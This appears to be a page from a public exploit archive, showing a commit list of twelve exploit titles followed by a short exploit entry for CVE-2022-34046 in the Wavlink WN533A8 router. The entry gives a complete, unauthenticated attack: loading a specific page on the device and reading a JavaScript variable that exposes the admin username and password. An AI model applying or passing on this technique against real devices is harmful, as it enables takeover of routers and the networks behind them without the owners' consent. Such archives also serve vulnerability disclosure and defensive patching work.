16b24da825
19 changes to exploits/shellcodes Omnia MPX 1.5.0+r1 - Path Traversal Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) Wavlink WN533A8 - Cross-Site Scripting (XSS) Wavlink WN530HG4 - Password Disclosure Wavlink WN533A8 - Password Disclosure WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download WordPress Plugin Duplicator 1.4.7 - Information Disclosure CuteEditor for PHP 6.6 - Directory Traversal mPDF 7.0 - Local File Inclusion NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
15 lines
No EOL
396 B
Text
15 lines
No EOL
396 B
Text
# Exploit Title: Wavlink WN533A8 - Password Disclosure
|
|
# Date: 2022-06-12
|
|
# Exploit Author: Ahmed Alroky
|
|
# Author Company : AIactive
|
|
# Version: M33A8.V5030.190716
|
|
# Vendor home page : wavlink.com
|
|
# Authentication Required: No
|
|
# CVE : CVE-2022-34046
|
|
# Tested on: Windows
|
|
|
|
# Exploit
|
|
|
|
view-source:http://IP_ADDRESS/sysinit.shtml
|
|
search for var syspasswd="
|
|
you will find the username and the password |